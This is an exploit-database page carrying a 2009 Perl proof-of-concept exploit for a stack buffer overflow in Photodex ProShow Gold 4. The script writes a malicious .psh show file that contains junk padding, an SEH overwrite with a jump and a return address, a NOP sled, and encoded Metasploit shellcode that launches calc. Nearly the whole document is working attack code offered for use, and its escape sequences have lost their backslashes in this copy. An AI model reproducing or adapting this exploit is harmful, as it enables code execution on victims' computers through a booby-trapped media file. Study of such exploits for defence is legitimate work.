[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Photodex ProShow Gold 4 (.psh File) Universal BOF Exploit XP SP3 (SEH)
# Published : 2009-08-24
# Author : corelanc0d3r
# Previous Title : Linux Kernel 2.4/2.6 sock_sendpage() ring0 Root Exploit (simple ver)
# Next Title : KSP 2006 FINAL ( .M3U) Universal Local Buffer Exploit (SEH)
#
# [+] Vulnerability : ProShow Gold 4 BOF
# [+] Detected by : Bkis - http://blog.bkis.com/?p=737
# [*] Sploit coded by : corelanc0d3r (corelanc0d3r[at]gmail[dot]com)
# [*] Sploit coded on : August 20, 2009
# [*] Type : local
# [*] OS : Windows
# [*] Product : Photodex ProShow Gold
# [*] Versions affected : 4.0
# [*] Download link : http://www.photodex.com/downloads/go_proshowgold
# [*] -------------------------------------------------------------------------
# [*] Method : SEH - Universal
# [*] Tested on : Windows XP SP3 En
# [*] Greetz&Tx to : Saumil/SK
# [*] -------------------------------------------------------------------------
# MMMMM~.
# MMMMM?.
# MMMMMM8. .=MMMMMMM.. MMMMMMMM, MMMMMMM8. MMMMM?. MMMMMMM: MMMMMMMMMM.
# MMMMMMMMMM=.MMMMMMMMMMM.MMMMMMMM=MMMMMMMMMM=.MMMMM?7MMMMMMMMMM: MMMMMMMMMMM:
# MMMMMIMMMMM+MMMMM$MMMMM=MMMMMD$I8MMMMMIMMMMM~MMMMM?MMMMMZMMMMMI.MMMMMZMMMMM:
# MMMMM==7III~MMMMM=MMMMM=MMMMM$. 8MMMMMZ$$$$$~MMMMM?..MMMMMMMMMI.MMMMM+MMMMM:
# MMMMM=. MMMMM=MMMMM=MMMMM7. 8MMMMM? . MMMMM?NMMMM8MMMMMI.MMMMM+MMMMM:
# MMMMM=MMMMM+MMMMM=MMMMM=MMMMM7. 8MMMMM?MMMMM:MMMMM?MMMMMIMMMMMO.MMMMM+MMMMM:
# =MMMMMMMMMZ~MMMMMMMMMM8~MMMMM7. .MMMMMMMMMMO:MMMMM?MMMMMMMMMMMMIMMMMM+MMMMM:
# .:$MMMMMO7:..+OMMMMMO$=.MMMMM7. ,IMMMMMMO$~ MMMMM?.?MMMOZMMMMZ~MMMMM+MMMMM:
# .,,,.. .,,,,. .,,,,, ..,,,.. .,,,,.. .,,...,,,. .,,,,..,,,,.
# eip hunters
# -----------------------------------------------------------------------------
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
#
print " [+] Preparing payloadn";
my $sploitfile="proshowsploit.psh";
my $fileheader="Photodex(R) ProShow(TM) Show File Version=0n".
"proshowVersion=2549n".
"title=Untitled ProShow 1n".
"fileName=proshowsploit.pshn".
"description=''n".
"showAspect=1n".
"showSizeX=16n".
"showSizeY=9n".
"loop=1n".
"loopRestart=1n".
"displaySizeX=704n".
"displaySizeY=528n".
"videoSizeX=720n".
"videoSizeY=480n".
"videoFrameRate=29970n".
"videoBitRate=1120000n".
"videoMuxBitRate=1394400n".
"outputImageSizeX=1024n".
"outputImageSizeY=768n".
"outputQuality=80n".
"toolbarEnable=1n".
"allowQuit=1n".
"allowPlay=1n".
"allowTime=1n".
"allowRestart=1n".
"allowSave=1n".
"allowSaveAll=1n".
"allowPrint=1n".
"allowPrintAll=1n".
"allowCopy=1n".
"allowSaver=1n".
"allowCta=1n".
"ctaLabel=ProShow Infon".
"ctaURL=http://www.photodex.com/n".
"background=1n".
"bgOutlineColor=0n".
"bgSizeMode=1n".
"bgColorizeColor=8421504n".
"waterOpacity=128n".
"waterZoom=10000n".
"waterColorizeColor=8421504n".
"musicVolumeOffset=100n".
"defaultCellVolumeOffset=100n".
"defaultCellFadeIn=100n".
"defaultCellFadeOut=100n".
"defaultMusicVolumeOffset=50n".
"defaultMusicFadeIn=100n".
"defaultMusicFadeOut=100n".
"maxDispWidth=800n".
"maxDispHeight=600n".
"maxRender=1n".
"maxRenderWidth=800n".
"maxRenderHeight=600n".
"randomTransitions=FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFFn".
"makeFileLocalFolder=c:/n".
"cells=2n".
"cell[0].imageEnable=1n".
"cell[0].nrOfImages=1n".
"cell[0].images[0].image=../../../../../Media Sources/ProShow Gold - Built-In Content/Backgrounds/Abstract_02.jpg";
my $junk = "A" x 6120;
my $nseh = "xebx18x90x90";
my $seh = pack('V',0x01a614ea);
my $nop="x90" x 30;
# windows/exec - 144 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc
my $shellcode="xdaxd1xd9x74x24xf4x2bxc9xb1x1exbdx78x41xbf" .
"x6fx58x83xe8xfcx31x68x14x03x68x6cxa3x4ax93" .
"x64x67xb5x6cx74xe3xf0x50xffx8fxffxd0xfex80" .
"x8bx6ex18xd4xd3x50x19x01xa2x1bx2dx5ex34xf2" .
"x7cxa0xaexa6xfaxe0xa5xb1xc3x2bx48xbfx01x40" .
"xa7x84xd1xb3x4cx8ex3cx30x13x54xbfxacxcax1f" .
"xb3x79x98x7fxd7x7cx75xf4xfbxf5x88xe0x8ax56" .
"xafxf2x4fx39x9ex0cx2fx90x84x7bxe9x2cxcex3c" .
"xf9xc7xa0xa0xacx53x28xd1x27x9bx2ax21x5dx0c" .
"x45x52x2bxa8xcaxfaxb3x4fx7exf4x94x50x98x6a" .
"x7bxc3x04x6d";
my $junk2="D" x (2000-length($shellcode));
my $filefooter = "ncell[0].images[0].imageEnable=1n".
"cell[0].images[0].name=Abstract_02n".
"cell[0].images[0].replaceableTemplate=1n".
"cell[0].images[0].sizeMode=1n".
"cell[0].images[0].colorizeColor=8421504n".
"cell[0].images[0].colorizeStrength=10000n".
"cell[0].images[0].outlineColor=16777215n".
"cell[0].images[0].aspectX=4n".
"cell[0].images[0].aspectY=3n".
"cell[0].images[0].videoVolume=100n".
"cell[0].images[0].objectId=1n".
"cell[0].images[0].videoSpeed=100n".
"cell[0].images[0].nrOfKeyframes=2n".
"cell[0].images[0].keyframes[0].timeSegment=1n".
"cell[0].images[0].keyframes[0].attributeMask=-1n".
"cell[0].images[0].keyframes[0].zoomX=10000n".
"cell[0].images[0].keyframes[0].zoomY=10000n".
"cell[0].images[0].keyframes[0].panAccelType=1n".
"cell[0].images[0].keyframes[0].zoomXAccelType=1n".
"cell[0].images[0].keyframes[0].zoomYAccelType=1n".
"cell[0].images[0].keyframes[0].rotationAccelType=1n".
"cell[0].images[0].keyframes[0].motionSmoothness=-1n".
"cell[0].images[0].keyframes[0].lockAR=1n".
"cell[0].images[0].keyframes[0].transparency=0n".
"cell[0].images[0].keyframes[0].colorizeColor=8421504n".
"cell[0].images[0].keyframes[0].colorizeStrength=10000n".
"cell[0].images[0].keyframes[0].shadowOffsetX=70n".
"cell[0].images[0].keyframes[0].shadowOffsetY=70n".
"cell[0].images[0].keyframes[1].timestamp=10000n".
"cell[0].images[0].keyframes[1].timeSegment=3n".
"cell[0].images[0].keyframes[1].segmentTimestamp=10000n".
"cell[0].images[0].keyframes[1].attributeMask=-1n".
"cell[0].images[0].keyframes[1].zoomX=10000n".
"cell[0].images[0].keyframes[1].zoomY=10000n".
"cell[0].images[0].keyframes[1].panAccelType=1n".
"cell[0].images[0].keyframes[1].zoomXAccelType=1n".
"cell[0].images[0].keyframes[1].zoomYAccelType=1n".
"cell[0].images[0].keyframes[1].rotationAccelType=1n".
"cell[0].images[0].keyframes[1].motionSmoothness=-1n".
"cell[0].images[0].keyframes[1].lockAR=1n".
"cell[0].images[0].keyframes[1].transparency=0n".
"cell[0].images[0].keyframes[1].colorizeColor=8421504n".
"cell[0].images[0].keyframes[1].colorizeStrength=10000n".
"cell[0].images[0].keyframes[1].shadowOffsetX=70n".
"cell[0].images[0].keyframes[1].shadowOffsetY=70n".
"cell[0].background=1n".
"cell[0].bgDefault=1n".
"cell[0].bgSizeMode=1n".
"cell[0].bgColorizeColor=8421504n".
"cell[0].sound.useDefault=1n".
"cell[0].sound.volume=100n".
"cell[0].sound.fadeIn=100n".
"cell[0].sound.fadeOut=100n".
"cell[0].sound.async=1n".
"cell[0].sound.musicUseDefault=1n".
"cell[0].sound.musicVolume=50n".
"cell[0].sound.musicFadeIn=100n".
"cell[0].sound.musicFadeOut=100n".
"cell[0].musicVolumeOffset=50n".
"cell[0].time=3000n".
"cell[0].transId=2n".
"cell[0].transTime=3000n".
"cell[0].includeGlobalCaptions=1n".
"cell[1].imageEnable=1n".
"cell[1].nrOfImages=1n".
"cell[1].images[0].image=../../../../../Media Sources/ProShow Gold - Built-In Content/Backgrounds/Abstract_01.jpgn".
"cell[1].images[0].imageEnable=1n".
"cell[1].images[0].name=Abstract_01n".
"cell[1].images[0].replaceableTemplate=1n".
"cell[1].images[0].sizeMode=1n".
"cell[1].images[0].colorizeColor=8421504n".
"cell[1].images[0].colorizeStrength=10000n".
"cell[1].images[0].outlineColor=16777215n".
"cell[1].images[0].aspectX=4n".
"cell[1].images[0].aspectY=3n".
"cell[1].images[0].videoVolume=100n".
"cell[1].images[0].objectId=2n".
"cell[1].images[0].videoSpeed=100n".
"cell[1].images[0].nrOfKeyframes=2n".
"cell[1].images[0].keyframes[0].timeSegment=1n".
"cell[1].images[0].keyframes[0].attributeMask=-1n".
"cell[1].images[0].keyframes[0].zoomX=10000n".
"cell[1].images[0].keyframes[0].zoomY=10000n".
"cell[1].images[0].keyframes[0].panAccelType=1n".
"cell[1].images[0].keyframes[0].zoomXAccelType=1n".
"cell[1].images[0].keyframes[0].zoomYAccelType=1n".
"cell[1].images[0].keyframes[0].rotationAccelType=1n".
"cell[1].images[0].keyframes[0].motionSmoothness=-1n".
"cell[1].images[0].keyframes[0].lockAR=1n".
"cell[1].images[0].keyframes[0].transparency=0n".
"cell[1].images[0].keyframes[0].colorizeColor=8421504n".
"cell[1].images[0].keyframes[0].colorizeStrength=10000n".
"cell[1].images[0].keyframes[0].shadowOffsetX=70n".
"cell[1].images[0].keyframes[0].shadowOffsetY=70n".
"cell[1].images[0].keyframes[1].timestamp=10000n".
"cell[1].images[0].keyframes[1].timeSegment=3n".
"cell[1].images[0].keyframes[1].segmentTimestamp=10000n".
"cell[1].images[0].keyframes[1].attributeMask=-1n".
"cell[1].images[0].keyframes[1].zoomX=10000n".
"cell[1].images[0].keyframes[1].zoomY=10000n".
"cell[1].images[0].keyframes[1].panAccelType=1n".
"cell[1].images[0].keyframes[1].zoomXAccelType=1n".
"cell[1].images[0].keyframes[1].zoomYAccelType=1n".
"cell[1].images[0].keyframes[1].rotationAccelType=1n".
"cell[1].images[0].keyframes[1].motionSmoothness=-1n".
"cell[1].images[0].keyframes[1].lockAR=1n".
"cell[1].images[0].keyframes[1].transparency=0n".
"cell[1].images[0].keyframes[1].colorizeColor=8421504n".
"cell[1].images[0].keyframes[1].colorizeStrength=10000n".
"cell[1].images[0].keyframes[1].shadowOffsetX=70n".
"cell[1].images[0].keyframes[1].shadowOffsetY=70n".
"cell[1].background=1n".
"cell[1].bgDefault=1n".
"cell[1].bgSizeMode=1n".
"cell[1].bgColorizeColor=8421504n".
"cell[1].sound.useDefault=1n".
"cell[1].sound.volume=100n".
"cell[1].sound.fadeIn=100n".
"cell[1].sound.fadeOut=100n".
"cell[1].sound.async=1n".
"cell[1].sound.musicUseDefault=1n".
"cell[1].sound.musicVolume=50n".
"cell[1].sound.musicFadeIn=100n".
"cell[1].sound.musicFadeOut=100n".
"cell[1].musicVolumeOffset=50n".
"cell[1].time=3000n".
"cell[1].transId=2n".
"cell[1].transTime=3000n".
"cell[1].includeGlobalCaptions=1n".
"modifierCount=0n";
my $payload = $fileheader.$junk.$nseh.$seh.$nop.$shellcode.$junk2.$filefooter;
print " [+] Writing payload to filen";
open($FILE,">$sploitfile");
print $FILE $payload;
close($FILE);
print " [+] Exploit file " . $sploitfile . " createdn";
print " [+] Wrote " . length($payload) . " bytesn";
# www.Syue.com [2009-08-24]